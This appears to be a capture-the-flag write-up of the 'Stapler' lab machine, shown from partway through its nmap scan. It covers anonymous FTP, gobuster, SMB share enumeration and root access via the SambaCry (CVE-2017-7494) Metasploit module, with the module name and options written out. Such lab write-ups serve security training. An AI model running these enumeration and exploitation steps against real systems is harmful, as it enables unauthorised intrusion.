|     	PRION:CVE-2018-2777	4.0	https://vulners.com/prion/PRION:CVE-2018-2777
|     	PRION:CVE-2018-2776	4.0	https://vulners.com/prion/PRION:CVE-2018-2776
|     	PRION:CVE-2018-2775	4.0	https://vulners.com/prion/PRION:CVE-2018-2775
|     	PRION:CVE-2018-2769	4.0	https://vulners.com/prion/PRION:CVE-2018-2769
|     	PRION:CVE-2018-2759	4.0	https://vulners.com/prion/PRION:CVE-2018-2759
|     	PRION:CVE-2018-2758	4.0	https://vulners.com/prion/PRION:CVE-2018-2758
|     	PRION:CVE-2018-2645	4.0	https://vulners.com/prion/PRION:CVE-2018-2645
|     	PRION:CVE-2017-3651	4.0	https://vulners.com/prion/PRION:CVE-2017-3651
|     	PRION:CVE-2017-3649	4.0	https://vulners.com/prion/PRION:CVE-2017-3649
|     	PRION:CVE-2017-3648	4.0	https://vulners.com/prion/PRION:CVE-2017-3648
|     	PRION:CVE-2017-3647	4.0	https://vulners.com/prion/PRION:CVE-2017-3647
|     	PRION:CVE-2017-3646	4.0	https://vulners.com/prion/PRION:CVE-2017-3646
|     	PRION:CVE-2017-3645	4.0	https://vulners.com/prion/PRION:CVE-2017-3645
|     	PRION:CVE-2017-3644	4.0	https://vulners.com/prion/PRION:CVE-2017-3644
|     	PRION:CVE-2017-3643	4.0	https://vulners.com/prion/PRION:CVE-2017-3643
|     	PRION:CVE-2017-3642	4.0	https://vulners.com/prion/PRION:CVE-2017-3642
|     	PRION:CVE-2017-3641	4.0	https://vulners.com/prion/PRION:CVE-2017-3641
|     	PRION:CVE-2017-3640	4.0	https://vulners.com/prion/PRION:CVE-2017-3640
|     	PRION:CVE-2017-3639	4.0	https://vulners.com/prion/PRION:CVE-2017-3639
|     	PRION:CVE-2017-3638	4.0	https://vulners.com/prion/PRION:CVE-2017-3638
|     	PRION:CVE-2017-3634	4.0	https://vulners.com/prion/PRION:CVE-2017-3634
|     	PRION:CVE-2017-3465	4.0	https://vulners.com/prion/PRION:CVE-2017-3465
|     	PRION:CVE-2017-3464	4.0	https://vulners.com/prion/PRION:CVE-2017-3464
|     	PRION:CVE-2017-3463	4.0	https://vulners.com/prion/PRION:CVE-2017-3463
|     	PRION:CVE-2017-3462	4.0	https://vulners.com/prion/PRION:CVE-2017-3462
|     	PRION:CVE-2017-3461	4.0	https://vulners.com/prion/PRION:CVE-2017-3461
|     	PRION:CVE-2017-3460	4.0	https://vulners.com/prion/PRION:CVE-2017-3460
|     	PRION:CVE-2017-3459	4.0	https://vulners.com/prion/PRION:CVE-2017-3459
|     	PRION:CVE-2017-3458	4.0	https://vulners.com/prion/PRION:CVE-2017-3458
|     	PRION:CVE-2017-3457	4.0	https://vulners.com/prion/PRION:CVE-2017-3457
|     	PRION:CVE-2017-3456	4.0	https://vulners.com/prion/PRION:CVE-2017-3456
|     	PRION:CVE-2017-3453	4.0	https://vulners.com/prion/PRION:CVE-2017-3453
|     	PRION:CVE-2017-3309	4.0	https://vulners.com/prion/PRION:CVE-2017-3309
|     	PRION:CVE-2017-3308	4.0	https://vulners.com/prion/PRION:CVE-2017-3308
|     	PRION:CVE-2017-3273	4.0	https://vulners.com/prion/PRION:CVE-2017-3273
|     	PRION:CVE-2017-3258	4.0	https://vulners.com/prion/PRION:CVE-2017-3258
|     	PRION:CVE-2017-3257	4.0	https://vulners.com/prion/PRION:CVE-2017-3257
|     	PRION:CVE-2017-3256	4.0	https://vulners.com/prion/PRION:CVE-2017-3256
|     	PRION:CVE-2017-3251	4.0	https://vulners.com/prion/PRION:CVE-2017-3251
|     	PRION:CVE-2017-3244	4.0	https://vulners.com/prion/PRION:CVE-2017-3244
|     	PRION:CVE-2017-3238	4.0	https://vulners.com/prion/PRION:CVE-2017-3238
|     	PRION:CVE-2017-10384	4.0	https://vulners.com/prion/PRION:CVE-2017-10384
|     	PRION:CVE-2017-10379	4.0	https://vulners.com/prion/PRION:CVE-2017-10379
|     	PRION:CVE-2017-10320	4.0	https://vulners.com/prion/PRION:CVE-2017-10320
|     	PRION:CVE-2017-10313	4.0	https://vulners.com/prion/PRION:CVE-2017-10313
|     	PRION:CVE-2017-10311	4.0	https://vulners.com/prion/PRION:CVE-2017-10311
|     	PRION:CVE-2017-10296	4.0	https://vulners.com/prion/PRION:CVE-2017-10296
|     	PRION:CVE-2017-10284	4.0	https://vulners.com/prion/PRION:CVE-2017-10284
|     	PRION:CVE-2017-10279	4.0	https://vulners.com/prion/PRION:CVE-2017-10279
|     	PRION:CVE-2017-10227	4.0	https://vulners.com/prion/PRION:CVE-2017-10227
|     	PRION:CVE-2017-10167	4.0	https://vulners.com/prion/PRION:CVE-2017-10167
|     	PRION:CVE-2017-10165	4.0	https://vulners.com/prion/PRION:CVE-2017-10165
|     	PRION:CVE-2016-8283	4.0	https://vulners.com/prion/PRION:CVE-2016-8283
|     	PRION:CVE-2016-5635	4.0	https://vulners.com/prion/PRION:CVE-2016-5635
|     	PRION:CVE-2016-5634	4.0	https://vulners.com/prion/PRION:CVE-2016-5634
|     	PRION:CVE-2016-5633	4.0	https://vulners.com/prion/PRION:CVE-2016-5633
|     	PRION:CVE-2016-5632	4.0	https://vulners.com/prion/PRION:CVE-2016-5632
|     	PRION:CVE-2016-5631	4.0	https://vulners.com/prion/PRION:CVE-2016-5631
|     	PRION:CVE-2016-5630	4.0	https://vulners.com/prion/PRION:CVE-2016-5630
|     	PRION:CVE-2016-5629	4.0	https://vulners.com/prion/PRION:CVE-2016-5629
|     	PRION:CVE-2016-5628	4.0	https://vulners.com/prion/PRION:CVE-2016-5628
|     	PRION:CVE-2016-5627	4.0	https://vulners.com/prion/PRION:CVE-2016-5627
|     	PRION:CVE-2016-5626	4.0	https://vulners.com/prion/PRION:CVE-2016-5626
|     	PRION:CVE-2016-5612	4.0	https://vulners.com/prion/PRION:CVE-2016-5612
|     	PRION:CVE-2016-5609	4.0	https://vulners.com/prion/PRION:CVE-2016-5609
|     	PRION:CVE-2019-2503	3.8	https://vulners.com/prion/PRION:CVE-2019-2503
|     	PRION:CVE-2018-2755	3.7	https://vulners.com/prion/PRION:CVE-2018-2755
|     	PRION:CVE-2021-2356	3.6	https://vulners.com/prion/PRION:CVE-2021-2356
|     	PRION:CVE-2021-2010	3.6	https://vulners.com/prion/PRION:CVE-2021-2010
|     	PRION:CVE-2020-2806	3.5	https://vulners.com/prion/PRION:CVE-2020-2806
|     	PRION:CVE-2020-2752	3.5	https://vulners.com/prion/PRION:CVE-2020-2752
|     	PRION:CVE-2020-2584	3.5	https://vulners.com/prion/PRION:CVE-2020-2584
|     	PRION:CVE-2020-14771	3.5	https://vulners.com/prion/PRION:CVE-2020-14771
|     	PRION:CVE-2019-2741	3.5	https://vulners.com/prion/PRION:CVE-2019-2741
|     	PRION:CVE-2018-3284	3.5	https://vulners.com/prion/PRION:CVE-2018-3284
|     	PRION:CVE-2018-3283	3.5	https://vulners.com/prion/PRION:CVE-2018-3283
|     	PRION:CVE-2018-3062	3.5	https://vulners.com/prion/PRION:CVE-2018-3062
|     	PRION:CVE-2018-2771	3.5	https://vulners.com/prion/PRION:CVE-2018-2771
|     	PRION:CVE-2018-2767	3.5	https://vulners.com/prion/PRION:CVE-2018-2767
|     	PRION:CVE-2017-3653	3.5	https://vulners.com/prion/PRION:CVE-2017-3653
|     	PRION:CVE-2017-3637	3.5	https://vulners.com/prion/PRION:CVE-2017-3637
|     	PRION:CVE-2017-3635	3.5	https://vulners.com/prion/PRION:CVE-2017-3635
|     	PRION:CVE-2017-3529	3.5	https://vulners.com/prion/PRION:CVE-2017-3529
|     	PRION:CVE-2017-3468	3.5	https://vulners.com/prion/PRION:CVE-2017-3468
|     	PRION:CVE-2017-3320	3.5	https://vulners.com/prion/PRION:CVE-2017-3320
|     	PRION:CVE-2017-3319	3.5	https://vulners.com/prion/PRION:CVE-2017-3319
|     	PRION:CVE-2017-3312	3.5	https://vulners.com/prion/PRION:CVE-2017-3312
|     	PRION:CVE-2017-3291	3.5	https://vulners.com/prion/PRION:CVE-2017-3291
|     	PRION:CVE-2017-10286	3.5	https://vulners.com/prion/PRION:CVE-2017-10286
|     	PRION:CVE-2016-8327	3.5	https://vulners.com/prion/PRION:CVE-2016-8327
|     	PRION:CVE-2016-8318	3.5	https://vulners.com/prion/PRION:CVE-2016-8318
|     	PRION:CVE-2016-8290	3.5	https://vulners.com/prion/PRION:CVE-2016-8290
|     	PRION:CVE-2016-8287	3.5	https://vulners.com/prion/PRION:CVE-2016-8287
|     	PRION:CVE-2016-8286	3.5	https://vulners.com/prion/PRION:CVE-2016-8286
|     	PRION:CVE-2016-5584	3.5	https://vulners.com/prion/PRION:CVE-2016-5584
|     	PRION:CVE-2013-1548	3.5	https://vulners.com/prion/PRION:CVE-2013-1548
|     	PRION:CVE-2023-22084	3.3	https://vulners.com/prion/PRION:CVE-2023-22084
|     	PRION:CVE-2023-22028	3.3	https://vulners.com/prion/PRION:CVE-2023-22028
|     	PRION:CVE-2023-22026	3.3	https://vulners.com/prion/PRION:CVE-2023-22026
|     	PRION:CVE-2023-22015	3.3	https://vulners.com/prion/PRION:CVE-2023-22015
|     	PRION:CVE-2023-22007	3.3	https://vulners.com/prion/PRION:CVE-2023-22007
|     	PRION:CVE-2022-21617	3.3	https://vulners.com/prion/PRION:CVE-2022-21617
|     	PRION:CVE-2022-21608	3.3	https://vulners.com/prion/PRION:CVE-2022-21608
|     	PRION:CVE-2022-21304	3.3	https://vulners.com/prion/PRION:CVE-2022-21304
|     	PRION:CVE-2022-21303	3.3	https://vulners.com/prion/PRION:CVE-2022-21303
|     	PRION:CVE-2022-21270	3.3	https://vulners.com/prion/PRION:CVE-2022-21270
|     	PRION:CVE-2021-2194	3.3	https://vulners.com/prion/PRION:CVE-2021-2194
|     	PRION:CVE-2021-2180	3.3	https://vulners.com/prion/PRION:CVE-2021-2180
|     	PRION:CVE-2021-2179	3.3	https://vulners.com/prion/PRION:CVE-2021-2179
|     	PRION:CVE-2021-2169	3.3	https://vulners.com/prion/PRION:CVE-2021-2169
|     	PRION:CVE-2021-2166	3.3	https://vulners.com/prion/PRION:CVE-2021-2166
|     	PRION:CVE-2021-2154	3.3	https://vulners.com/prion/PRION:CVE-2021-2154
|     	PRION:CVE-2021-2146	3.3	https://vulners.com/prion/PRION:CVE-2021-2146
|     	PRION:CVE-2021-2001	3.3	https://vulners.com/prion/PRION:CVE-2021-2001
|     	PRION:CVE-2020-14812	3.3	https://vulners.com/prion/PRION:CVE-2020-14812
|     	PRION:CVE-2020-14793	3.3	https://vulners.com/prion/PRION:CVE-2020-14793
|     	PRION:CVE-2020-14790	3.3	https://vulners.com/prion/PRION:CVE-2020-14790
|     	PRION:CVE-2020-14789	3.3	https://vulners.com/prion/PRION:CVE-2020-14789
|     	PRION:CVE-2020-14776	3.3	https://vulners.com/prion/PRION:CVE-2020-14776
|     	PRION:CVE-2020-14672	3.3	https://vulners.com/prion/PRION:CVE-2020-14672
|     	PRION:CVE-2020-14547	3.3	https://vulners.com/prion/PRION:CVE-2020-14547
|     	PRION:CVE-2020-14540	3.3	https://vulners.com/prion/PRION:CVE-2020-14540
|     	PRION:CVE-2019-2960	3.3	https://vulners.com/prion/PRION:CVE-2019-2960
|     	PRION:CVE-2019-2911	3.3	https://vulners.com/prion/PRION:CVE-2019-2911
|     	PRION:CVE-2019-2774	3.3	https://vulners.com/prion/PRION:CVE-2019-2774
|     	PRION:CVE-2019-2757	3.3	https://vulners.com/prion/PRION:CVE-2019-2757
|     	PRION:CVE-2019-2755	3.3	https://vulners.com/prion/PRION:CVE-2019-2755
|     	PRION:CVE-2019-2737	3.3	https://vulners.com/prion/PRION:CVE-2019-2737
|     	PRION:CVE-2019-2592	3.3	https://vulners.com/prion/PRION:CVE-2019-2592
|     	PRION:CVE-2019-2581	3.3	https://vulners.com/prion/PRION:CVE-2019-2581
|     	PRION:CVE-2016-8289	3.3	https://vulners.com/prion/PRION:CVE-2016-8289
|     	PRION:CVE-2019-2739	2.9	https://vulners.com/prion/PRION:CVE-2019-2739
|     	PRION:CVE-2021-2011	2.6	https://vulners.com/prion/PRION:CVE-2021-2011
|     	PRION:CVE-2021-2007	2.6	https://vulners.com/prion/PRION:CVE-2021-2007
|     	PRION:CVE-2019-1559	2.6	https://vulners.com/prion/PRION:CVE-2019-1559
|     	PRION:CVE-2018-0735	2.6	https://vulners.com/prion/PRION:CVE-2018-0735
|     	PRION:CVE-2022-21460	2.1	https://vulners.com/prion/PRION:CVE-2022-21460
|     	PRION:CVE-2022-21451	2.1	https://vulners.com/prion/PRION:CVE-2022-21451
|     	PRION:CVE-2022-21444	2.1	https://vulners.com/prion/PRION:CVE-2022-21444
|     	PRION:CVE-2020-14550	2.1	https://vulners.com/prion/PRION:CVE-2020-14550
|     	PRION:CVE-2019-2993	2.1	https://vulners.com/prion/PRION:CVE-2019-2993
|     	PRION:CVE-2019-2969	2.1	https://vulners.com/prion/PRION:CVE-2019-2969
|     	PRION:CVE-2019-2738	2.1	https://vulners.com/prion/PRION:CVE-2019-2738
|     	PRION:CVE-2018-2762	2.1	https://vulners.com/prion/PRION:CVE-2018-2762
|     	PRION:CVE-2016-7440	2.1	https://vulners.com/prion/PRION:CVE-2016-7440
|     	PRION:CVE-2018-3174	1.9	https://vulners.com/prion/PRION:CVE-2018-3174
|     	PRION:CVE-2018-2773	1.9	https://vulners.com/prion/PRION:CVE-2018-2773
|     	PRION:CVE-2022-21595	1.7	https://vulners.com/prion/PRION:CVE-2022-21595
|     	PRION:CVE-2021-2174	1.7	https://vulners.com/prion/PRION:CVE-2021-2174
|     	PRION:CVE-2021-2171	1.7	https://vulners.com/prion/PRION:CVE-2021-2171
|     	PRION:CVE-2021-2022	1.7	https://vulners.com/prion/PRION:CVE-2021-2022
|     	PRION:CVE-2019-2938	1.7	https://vulners.com/prion/PRION:CVE-2019-2938
|     	PRION:CVE-2019-2614	1.7	https://vulners.com/prion/PRION:CVE-2019-2614
|     	PRION:CVE-2017-3317	1.5	https://vulners.com/prion/PRION:CVE-2017-3317
|     	PRION:CVE-2017-3313	1.5	https://vulners.com/prion/PRION:CVE-2017-3313
|     	PRION:CVE-2017-10268	1.5	https://vulners.com/prion/PRION:CVE-2017-10268
|     	PRION:CVE-2019-2797	1.2	https://vulners.com/prion/PRION:CVE-2019-2797
|     	PRION:CVE-2016-8284	1.2	https://vulners.com/prion/PRION:CVE-2016-8284
|     	PRION:CVE-2017-3318	1.0	https://vulners.com/prion/PRION:CVE-2017-3318
|_    	PACKETSTORM:142362	0.0	https://vulners.com/packetstorm/PACKETSTORM:142362	*EXPLOIT*
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.80%I=7%D=1/7%Time=659AC8FF%P=x86_64-pc-linux-gnu%r(NULL
SF:,1284,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x15
SF:2\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04
SF:\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2
SF:\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x
SF:0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb
SF:2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\
SF:xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3
SF:\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0
SF:\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x8
SF:7\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf
SF:4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xd
SF:c\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5
SF:\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf
SF:\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\
SF:xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x
SF:8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\x
SF:e7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\
SF:xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x
SF:9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\x
SF:f1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\x
SF:f8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\
SF:xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\x
SF:d2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\
SF:xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[
SF:\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xc
SF:c\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7
SF:\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\x
SF:fd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96
SF:\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\
SF:xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\
SF:xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x
SF:88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbc
SF:L}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\
SF:.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\x
SF:f6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf
SF:3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?
SF:\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/7%OT=21%CT=20%CU=42871%PV=Y%DS=4%DC=T%G=Y%TM=659AC94
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%TS=8)SEQ(TS=8)OPS(
OS:O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11
OS:NW7%O6=M54EST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=85A9%RUD=G)IE(R=N)

Network Distance: 4 hops
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2024-01-07T15:54:08+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-01-07T15:54:09
|_  start_date: N/A

TRACEROUTE (using port 20/tcp)
HOP RTT       ADDRESS
1   192.86 ms 192.168.45.1
2   192.82 ms 192.168.45.254
3   192.90 ms 192.168.251.1
4   192.99 ms 192.168.225.148

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.33 seconds

nmap scan

port 80 and 3306

Host script results

Enumerating FTP (Port 21)

  • Enumerated FTP server on port 21 first. Found a file named note which contains certain instructions.

$ ftp 192.168.228.148
Connected to 192.168.228.148.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.228.148:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (188.2742 kB/s)
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> exit
221 Goodbye.

FTP Enumeration

cat note

Enumerating HTTP (Port 80)

  • Next, moved to port 80 for enumeration. Found a 404 not found error in the root directory. Fired gobuster on the web server to reveal some hidden directories but found no luck.

HTTP server on port 80

gobuster dir -u http://192.168.228.148/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php

gobuster scan

Enumerating Samba (Port 139)

  • Moving on, enumerated the Samba shares using smbclient and got two interesting ones – kathy and tmp. First enumerated the “tmp” share but found nothing.

smbclient -L 192.168.228.148

SMB Enumeration

  • Next, accessed the kathy share and found two folder inside it. The kathy_stuff folder contains a to-do list file and backup folder contains copy of the vsftpd conf file and a wordpress compressed backup. I was able to download all the files except the wordpress backup.

$ smbclient //192.168.228.148/kathy
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 22:22:52 2016
  ..                                  D        0  Tue Jun  7 03:09:56 2016
  kathy_stuff                         D        0  Sun Jun  5 20:32:27 2016
  backup                              D        0  Sun Jun  5 20:34:14 2016

		19478204 blocks of size 1024. 16345572 blocks available

smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 20:32:27 2016
  ..                                  D        0  Fri Jun  3 22:22:52 2016
  todo-list.txt                       N       64  Sun Jun  5 20:32:27 2016

		19478204 blocks of size 1024. 16345572 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> cd backup
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 20:34:14 2016
  ..                                  D        0  Fri Jun  3 22:22:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 20:33:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 22:44:46 2015

		19478204 blocks of size 1024. 16345572 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (3.1 KiloBytes/sec) (average 2.1 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz
parallel_read returned NT_STATUS_IO_TIMEOUT

SMB Enumeration

  • Peeked inside the config file and the todo list but found nothing juicy.

cat todo-list.txt

cat vsftpd.conf

Exploitation & Getting root:

  • As per the above nmap results, i got the version of the Samba running – Samba 4.3.9. Googled it for any known exploits and found that it is vulnerable to CVE-2017-7494 (SambaCry) which is a RCE vulnerability that allows a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.

CVE-2017-7494

  • I found that we can also use metasploit to exploit this vulnerability and get a shell on the system. So, changed some configuration of the exploit and fired it on the target which thus grants me root access on the server.

Alternate exploithttps://github.com/joxeankoret/CVE-2017-7494

msfconsole

use exploit/linux/samba/is_known_pipename

set RHOSTS 192.168.228.148

set RPORT 139

run

Pipename exploit

got root

  • Finally, captured both local and proof flag and completed the challenge.

proof flag

Also Read: PG – RubyDome

Conclusion:

Conclusion

So that was “Stapler” for you. We started off with a regular nmap scan and found multiple ports opened – 21 (FTP), 22 (SSH), 80 (HTTP), 139 (Samba), 666 (Doom), 3306 (MySQL). As per the nmap result, found out that target is running Samba 4.3.9. Looked online for any known exploit and found out that it is vulnerable to CVE-2017-7494. Next, used the same exploit to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top